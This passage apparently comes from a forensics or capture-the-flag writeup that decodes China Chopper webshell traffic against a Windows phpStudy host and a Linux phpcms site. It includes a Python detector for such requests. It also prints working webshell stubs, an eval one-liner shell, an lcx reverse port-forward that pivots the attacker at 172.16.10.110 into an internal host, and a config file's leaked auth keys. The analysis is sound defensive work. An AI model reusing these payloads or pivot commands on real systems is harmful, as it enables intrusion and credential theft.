AUTOEXEC.BAT    2017-08-29 10:10:54 0   0777
boot.ini    2017-08-29 10:06:43 221 0666
bootfont.bin    2007-03-07 20:00:00 322730  0444
CONFIG.SYS  2017-08-29 10:10:54 0   0666
Hscan...........zip 2017-09-05 17:41:19 1170778 0666
IO.SYS  2017-08-29 10:10:54 0   0444
lcx.exe 2017-09-05 17:49:48 8704    0777
MSDOS.SYS   2017-08-29 10:10:54 0   0444
NTDETECT.COM    2007-03-07 20:00:00 47772   0555
ntldr   2007-03-07 20:00:00 306288  0444 
pagefile.sys    2017-09-05 14:40:40 1610612736  0666

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='cmd';$s='cd /d C:\\phpStudy\\WWW\\&C:\\lcx.exe -slave 172.16.10.110 8888 192.168.20.88 80&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// Run C:\lcx.exe -slave 172.16.10.110 8888 192.168.20.88 80
// In -slave mode lcx connects out to the attacker's 172.16.10.110:8888 and relays that connection to 192.168.20.88:80,
// so the compromised Windows host becomes a pivot into the 192.168.20.0/24 segment. This is the tunnel the phpcms
// exploit travelled through: the register POST seen earlier came from 172.16.10.110:8888, and the phpcms site
// (/var/www/html, a Linux host) is 192.168.20.88, not 192.168.20.117.

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");echo fwrite(fopen('C:\\phpStudy\\WWW\\1.txt','w'),$_POST['z1'])?'1':'0';;echo("X@Y");die();
// Write the file C:\phpStudy\WWW\1.txt with the contents of z1, i.e. the one-liner the phpcms exploit then fetches from this host:
<?php @eval($_POST['t'])?>

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List every file under C:\phpStudy\WWW\

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List every file under C:\phpStudy\WWW\ (repeat)
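The grep/sed/tr pipeline above, like the ipython base64 step used for the second shell further down, decodes these payloads by hand. The Python script below is an added example (not part of the original writeup) that automates the whole step and applies equally to the other shell: it picks out POSTs carrying the China Chopper fingerprints (forged Baiduspider User-Agent, array_map in the body), base64-decodes z0, classifies the action from the stub, and flags the post-exploitation events seen in this capture (PE drop, credential dump, port forward, new shell). The body layout t=<wrapper>&z0=<base64 PHP>&z1=<argument> is assumed from the public Chopper client, and both the sample dump and the abbreviated server stubs inside it are constructed to match the shapes decoded above.

```python
"""Decode China Chopper-style webshell requests from a tcpdump -A text dump."""
import base64
import re
from urllib.parse import parse_qs, urlencode

# China Chopper client fingerprints seen in this capture.
SPIDER_UA = ("Mozilla/5.0 (compatible; Baiduspider/2.0; "
             "+http://www.baidu.com/search/spider.html)")
REQUEST = re.compile(r"^POST (\S+) HTTP/1\.[01]\r?\n(.*?)\r?\n\r?\n([^\r\n]*)", re.M | re.S)
PHP_STR = r"['\"]((?:[^'\"\\]|\\.)*)['\"]"   # one PHP string literal, escapes allowed

# Abbreviated server stubs (constructed) in the shape of the payloads decoded
# above; PHP writes a backslash inside a single-quoted string as \\.
STUB_EXEC = (r"echo('X@Y');$p='cmd';$s='cd /d C:\\phpStudy\\WWW\\&{cmd}&echo [S]&cd&echo [E]';"
             r"$fp=proc_open($r.' 2>&1',$array,$pipes);print $ret;echo('X@Y');die();")
STUB_WRITE_HEX = (r"echo('X@Y');$f='{path}';$c=$_POST['z1'];"
                  r"for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode('%'.substr($c,$i,2));"
                  r"echo(@fwrite(fopen($f,'w'),$buf)?'1':'0');echo('X@Y');die();")
STUB_WRITE_RAW = r"echo('X@Y');echo fwrite(fopen('{path}','w'),$_POST['z1'])?'1':'0';echo('X@Y');die();"
STUB_LIST = r"echo('X@Y');$D='{path}';$F=@opendir($D);echo $M.$L;@closedir($F);echo('X@Y');die();"
STUB_SYSINFO = r"echo('X@Y');$D=dirname(__FILE__);$R.=php_uname();print $R;echo('X@Y');die();"

def chopper_request(uri, php, z1=None):
    """One request rendered the way tcpdump -A prints it (constructed sample)."""
    fields = {"t": 'array_map("assert",array("eval(base64_decode($_POST[z0]));"));',
              "z0": base64.b64encode(php.encode()).decode()}
    if z1 is not None:
        fields["z1"] = z1
    body = urlencode(fields)   # percent-encodes the + and = of the base64, like the real client
    return ("17:35:41.557144 IP 172.16.10.110.5299 > 192.168.20.117.80: Flags [P.]: HTTP\n"
            f"POST {uri} HTTP/1.1\nHost: 192.168.20.117\nUser-Agent: {SPIDER_UA}\n"
            f"Content-Type: application/x-www-form-urlencoded\nContent-Length: {len(body)}\n\n{body}\n")

WWW = r"C:\\phpStudy\\WWW\\"   # PHP-escaped, exactly as it sits inside z0
SAMPLE_DUMP = "".join([
    chopper_request("/9.php", STUB_SYSINFO),
    chopper_request("/9.php", STUB_EXEC.format(cmd="whoami")),
    chopper_request("/9.php", STUB_WRITE_HEX.format(path=WWW + "mimikatz.exe"), z1="4d5a9000"),
    chopper_request("/9.php", STUB_EXEC.format(cmd=r"C:\\lcx.exe -slave 172.16.10.110 8888 192.168.20.88 80")),
    chopper_request("/9.php", STUB_WRITE_RAW.format(path=WWW + "1.txt"), z1="<?php @eval($_POST['t'])?>"),
    chopper_request("/uploadfile/2017/0905/20170905055411283.php", STUB_LIST.format(path="/var/www/html/")),
    # decoy: an ordinary form POST with a browser User-Agent, which must be ignored
    "POST /plus/search.php HTTP/1.1\nHost: 192.168.20.117\nUser-Agent: Mozilla/5.0\n\nkeyword=test\n",
])

def chopper_requests(dump):
    """(uri, params) for every POST carrying both Chopper fingerprints."""
    hits = []
    for uri, headers, body in REQUEST.findall(dump):
        if "spider.html" in headers and "array_map" in body:
            hits.append((uri, {k: v[0] for k, v in parse_qs(body).items()}))
    return hits

def php_unescape(s):
    return s.replace("\\\\", "\\").replace("\\'", "'")

def _assigned(php, var):
    """The string literal assigned to `var` (e.g. $s) in the stub, unescaped."""
    m = re.search(re.escape(var) + "=" + PHP_STR, php)
    return php_unescape(m.group(1)) if m else None

def classify(php, params):
    """Map one decoded z0 stub to the action it performs, pulling out its argument."""
    if "proc_open(" in php:
        return {"action": "exec", "command": _assigned(php, "$s")}
    if "urldecode('%'" in php and "fwrite(" in php:   # hex-encoded file upload carried in z1
        return {"action": "write_hex", "path": _assigned(php, "$f"),
                "data": bytes.fromhex(params.get("z1", ""))}
    m = re.search(r"fwrite\(fopen\(" + PHP_STR + r",'w'\),\$_POST\['z1'\]\)", php)
    if m:                                              # plain-text write of z1
        return {"action": "write", "path": php_unescape(m.group(1)), "data": params.get("z1", "")}
    if "php_uname(" in php:
        return {"action": "sysinfo"}
    if "opendir(" in php:
        return {"action": "list", "path": _assigned(php, "$D")}
    if "fread(" in php or "readfile(" in php:
        return {"action": "read", "path": _assigned(php, "$F")}
    return {"action": "unknown", "php": php[:80]}

def decode_dump(dump):
    """Fingerprint, decode and classify every Chopper request in the dump, in order."""
    rows = []
    for uri, params in chopper_requests(dump):
        php = base64.b64decode(params["z0"]).decode("utf-8", "replace")
        rows.append({"uri": uri, **classify(php, params)})
    return rows

def indicators(rows):
    """Events worth a finding: PE drop, new webshell, credential dump, pivot."""
    found = []
    for r in rows:
        if r["action"] == "write_hex" and r["data"][:2] == b"MZ":
            found.append("PE dropped: " + r["path"])
        elif r["action"] == "write" and "eval(" in r["data"]:
            found.append("webshell written: " + r["path"])
        elif r["action"] == "exec":
            if "mimikatz" in r["command"].lower():
                found.append("credential dump: " + r["command"])
            if "lcx" in r["command"].lower() and "-slave" in r["command"]:
                found.append("port forward: " + r["command"])
    return found

if __name__ == "__main__":
    for row in decode_dump(SAMPLE_DUMP):
        print(row["uri"], row["action"], row.get("command") or row.get("path", ""))
    print(indicators(decode_dump(SAMPLE_DUMP)))
```

Run against a real http.txt, replace SAMPLE_DUMP with the file contents; the classifier keys only on the stub fragments that stay constant across Chopper versions (proc_open, the urldecode('%'...) hex loop, opendir, php_uname), so it survives the operator changing paths and commands.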

Now the other webshell:

grep -n -C 32 'POST /uploadfile/2017/0905/20170905055411283.php' http.txt | grep array_map | sed 's/%3D/\=/g' | sed 's/%2F/\//g' | sed 's/%2B/\+/g' | grep -E 'xx\(.+' -o | sed 's/^xx//g' > base64
http ›› ipython                                                                                                                                                                              
In [1]: with open("base64") as f:
   ...:     for line in f:
   ...:         # Python 2: drop the wrapper characters around z0, then base64-decode it
   ...:         print line[2:-12].decode("base64")
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/include/crons/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List every file under /var/www/html/include/crons/

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/include/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List every file under /var/www/html/include/

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/include/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List every file under /var/www/html/include/ (repeat)

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List every file under /var/www/html/ (this is the phpcms v9 install on the second, Linux host):
X@Yphpsso_server/   2017-09-03 03:31:30 4096    0777
api/    2017-09-03 03:31:44 4096    0777
statics/    2017-09-03 03:31:44 4096    0777
caches/ 2017-09-03 03:45:14 4096    0777
./  2017-09-03 03:38:34 4096    0777
html/   2017-09-03 03:37:50 4096    0777
phpcms/ 2017-09-03 03:31:27 4096    0777
../ 2017-09-03 03:30:49 4096    0755
uploadfile/ 2017-09-05 02:25:38 4096    0777
api.php 2017-09-03 03:31:44 989 0777
plugin.php  2017-09-03 03:31:44 3593    0777
favicon.ico 2017-09-03 03:31:44 3158    0777
js.html 2017-09-03 03:31:44 520 0777
crossdomain.xml 2017-09-03 03:31:44 104 0777
admin.php   2017-09-03 03:31:44 48  0777
robots.txt  2017-09-03 03:31:44 170 0777
index.php   2017-09-03 03:31:44 313 0777
index.html  2017-09-05 00:13:08 9578    0777

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F='/var/www/html/api.php';$P=@fopen($F,'r');echo(@fread($P,filesize($F)));@fclose($P);;echo("X@Y");die();
// Read the contents of /var/www/html/api.php:
<?php                  
/**                       
 *  index.php API ....    
 *                        
 * @copyright           (C) 2005-2010 PHPCMS
 * @license             http://www.phpcms.cn/license/
 * @lastmodify          2010-7-26
 */                       
define('PHPCMS_PATH', dirname(__FILE__).DIRECTORY_SEPARATOR);
include PHPCMS_PATH.'phpcms/base.php';
$param = pc_base::load_sys_class('param');
$_userid = param::get_cookie('_userid');
if($_userid) {            
    $member_db = pc_base::load_model('member_model');
    $_userid = intval($_userid);
    $memberinfo = $member_db->get_one(array('userid'=>$_userid),'islock');
    if($memberinfo['islock']) exit('<h1>Bad Request!</h1>');
}                         
$op = isset($_GET['op']) && trim($_GET['op']) ? trim($_GET['op']) : exit('Operation can not be empty');
if (isset($_GET['callback']) && !preg_match('/^[a-zA-Z_][a-zA-Z0-9_]+$/', $_GET['callback']))  unset($_GET['callback']);
if (!preg_match('/([^a-z_]+)/i',$op) && file_exists(PHPCMS_PATH.'api/'.$op.'.php')) {
    include PHPCMS_PATH.'api/'.$op.'.php';
} else {                  
    exit('API handler does not exist');
}                         
?>

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/phpcms/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// list all entries under the directory /var/www/html/phpcms/
model/   2017-09-03 03:31:17 4096    0777
libs/   2017-09-03 03:31:16 4096    0777
languages/  2017-09-03 03:31:15 4096    0777
./  2017-09-03 03:31:27 4096    0777
plugin/ 2017-09-03 03:31:27 4096    0777
templates/  2017-09-03 03:31:27 4096    0777
../ 2017-09-03 03:38:34 4096    0777
modules/    2017-09-03 03:31:27 4096    0777
base.php    2017-09-03 03:31:15 8462    0777
index.html  2017-09-03 03:31:15 1   0777

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F='/var/www/html/phpcms/base.php';$P=@fopen($F,'r');echo(@fread($P,filesize($F)));@fclose($P);;echo("X@Y");die();
// read the contents of the file /var/www/html/phpcms/base.php
<?php
/**
 *  base.php PHPCMS............
 *
 * @copyright           (C) 2005-2010 PHPCMS
 * @license             http://www.phpcms.cn/license/
 * @lastmodify          2010-6-7
 */
define('IN_PHPCMS', true);                                                                     
//PHPCMS........
define('PC_PATH', dirname(__FILE__).DIRECTORY_SEPARATOR);
if(!defined('PHPCMS_PATH')) define('PHPCMS_PATH', PC_PATH.'..'.DIRECTORY_SEPARATOR);
...

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/caches/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// list all entries under the directory /var/www/html/caches/
caches_admin/    2017-09-03 03:37:50 4096    0777
caches_content/ 2017-09-03 03:37:50 4096    0777
poster_js/  2017-09-03 03:37:50 4096    0777
bakup/  2017-09-03 03:37:50 4096    0777
caches_commons/ 2017-09-03 03:37:50 4096    0777
caches_tpl_data/    2017-09-03 03:37:50 4096    0777
caches_linkage/ 2017-09-03 03:37:50 4096    0777
caches_model/   2017-09-03 03:37:50 4096    0777
./  2017-09-03 03:45:14 4096    0777
vote_js/    2017-09-03 03:37:50 4096    0777
caches_search/  2017-09-03 03:38:33 4096    0755
caches_scan/    2017-09-03 03:37:50 4096    0777
caches_member/  2017-09-03 03:37:50 4096    0777
sessions/   2017-09-03 03:37:50 4096    0777
../ 2017-09-03 03:38:34 4096    0777
configs/    2017-09-03 03:37:50 4096    0777
caches_template/    2017-09-03 03:45:14 4096    0777
install.lock    2017-09-03 03:38:34 0   0644
error_log.php   2017-09-05 02:54:12 769 0644
index.html  2017-09-03 03:31:45 1   0777

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/caches/configs/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// list all entries under the directory /var/www/html/caches/configs/
./   2017-09-03 03:37:50 4096    0777
../ 2017-09-03 03:45:14 4096    0777
ku6server.php   2017-09-03 03:31:45 208 0777
sub_config.php  2017-09-03 03:31:45 1376    0777
route.php   2017-09-03 03:31:45 803 0777
credit.php  2017-09-03 03:31:45 122 0777
cache.php   2017-09-03 03:31:45 330 0777
database.php    2017-09-03 03:38:32 324 0777
model_config.php    2017-09-03 03:31:45 52  0777
version.php 2017-09-03 03:31:45 118 0777
modules.php 2017-09-03 03:38:33 212 0777
ku6status_config.php    2017-09-03 03:31:45 781 0777
snda.php    2017-09-03 03:31:45 51  0777
system.php  2017-09-05 00:11:58 2430    0777

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F='/var/www/html/caches/configs/system.php';$P=@fopen($F,'r');echo(@fread($P,filesize($F)));@fclose($P);;echo("X@Y");die();
// read the contents of the file /var/www/html/caches/configs/system.php (note the auth_key and phpsso_auth_key below)
X@Y<?php                 
return array(            
//........               
'web_path' => '/',                                                                                                     
//Session....     
'session_storage' => 'mysql',
'session_ttl' => 1800,   
'session_savepath' => CACHE_PATH.'sessions/',
'session_n' => 0,        
//Cookie....             
'cookie_domain' => '', //Cookie ......
'cookie_path' => '', //Cookie ........
'cookie_pre' => 'LTBnY_', //Cookie ......................................Cookie....
'cookie_ttl' => 0, //Cookie ..........0 ................
//............           
'tpl_root' => 'templates/', //................
'tpl_name' => 'default', //................
'tpl_css' => 'default', //............
'tpl_referesh' => 1,     
'tpl_edit'=> 0,//....................
//............           
'upload_path' => PHPCMS_PATH.'uploadfile/',
'upload_url' => 'http://192.168.20.88/uploadfile/', //........
'attachment_stat' => '1',//.................... 0 .... 1 ...... ....: ......................
'js_path' => 'http://192.168.20.88/statics/js/', //CDN JS
'css_path' => 'http://192.168.20.88/statics/css/', //CDN CSS
'img_path' => 'http://192.168.20.88/statics/images/', //CDN img
'app_path' => 'http://192.168.20.88/',//................
'charset' => 'gbk', //..........
'timezone' => 'Etc/GMT-8', //..............php 5.1................Etc/GMT-8 ............ GMT+8
'debug' => 0, //................
'admin_log' => 1, //....................
'errorlog' => 1, //1................ cache/error_log.php | 0................
'gzip' => 1, //....Gzip..........
'auth_key' => 'AivCd1tuXDZfzVOKBybL', //....
'lang' => 'zh-cn',  //..........
'lock_ex' => '1',  //........................................nfs..........
'admin_founders' => '1', //..........ID......ID........
'execution_sql' => 0, //EXECUTION_SQL
'execution_sql' => 0, //EXECUTION_SQL
'phpsso' => '1',    //........phpsso
'phpsso_appid' => '1',  //....id    
'phpsso_api_url' => 'http://192.168.20.88/phpsso_server',   //........
'phpsso_auth_key' => 'AUch7BSWgtuikaORhVcUyOgkyY69Glwb', //........
'phpsso_version' => '1', //phpsso....
'html_root' => '/html',//................
'safe_card'=>'1',//..............
'connect_enable' => '1',    //..................
'sina_akey' => '',  //sina AKEY
'sina_skey' => '',  //sina SKEY
'snda_akey' => '',  //.......... akey
'snda_skey' => '',  //.......... skey
'qq_akey' => '',    //qq skey
'qq_skey' => '',    //qq skey
'qq_appkey' => '',  //QQ........ appkey
'qq_appid' => '',   //QQ........ appid
'qq_callback' => '',    //QQ........ callback
'admin_url' => '',  //..................
);                        
?>


@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='/bin/sh';$s='cd /var/www/html/include/;whoami;echo [S];pwd;echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// execute the command whoami (wrapped by the client as "cd <dir>;whoami;echo [S];pwd;echo [E]")
www-data

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='/bin/sh';$s='cd /var/www/html/uploadfile/2017/0905/;uname -a;echo [S];pwd;echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// execute the command uname -a
Linux localhost 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='/bin/sh';$s='cd /var/www/html/uploadfile/2017/0905/;ipconfig;echo [S];pwd;echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// execute the command ipconfig (does not exist on Linux, so only the trailing pwd output came back)
/var/www/html/uploadfile/2017/0905

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='/bin/sh';$s='cd /var/www/html/uploadfile/2017/0905/;ifconfig;echo [S];pwd;echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// execute the command ifconfig (confirms the internal host is 192.168.20.88)
ens33     Link encap:Ethernet  HWaddr 00:0c:29:da:d6:4e  
          inet addr:192.168.20.88  Bcast:192.168.20.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:feda:d64e/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:150300 errors:0 dropped:0 overruns:0 frame:0
          TX packets:49841 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:162871217 (162.8 MB)  TX bytes:5569466 (5.5 MB)
                         
lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:227 errors:0 dropped:0 overruns:0 frame:0
          TX packets:227 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:20038 (20.0 KB)  TX bytes:20038 (20.0 KB)
              

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/include/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// list all entries under the directory /var/www/html/include/ (does not exist on this host)
ERROR:// Path Not Found Or No Permission!

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// list all entries under the directory /var/www/
./   2017-09-03 03:30:49 4096    0755
html/   2017-09-03 03:38:34 4096    0777
../ 2017-09-03 00:57:48 4096    0755

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// list all entries under the directory /var/www/html/
phpsso_server/   2017-09-03 03:31:30 4096    0777
api/    2017-09-03 03:31:44 4096    0777
statics/    2017-09-03 03:31:44 4096    0777
caches/ 2017-09-03 03:45:14 4096    0777
./  2017-09-03 03:38:34 4096    0777
html/   2017-09-03 03:37:50 4096    0777
phpcms/ 2017-09-03 03:31:27 4096    0777
../ 2017-09-03 03:30:49 4096    0755
uploadfile/ 2017-09-05 02:25:38 4096    0777
api.php 2017-09-03 03:31:44 989 0777
plugin.php  2017-09-03 03:31:44 3593    0777
favicon.ico 2017-09-03 03:31:44 3158    0777
js.html 2017-09-03 03:31:44 520 0777
crossdomain.xml 2017-09-03 03:31:44 104 0777
admin.php   2017-09-03 03:31:44 48  0777
robots.txt  2017-09-03 03:31:44 170 0777
index.php   2017-09-03 03:31:44 313 0777
index.html  2017-09-05 00:13:08 9578    0777

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// list all entries under the directory /var/www/html/ (repeated request, no output captured)

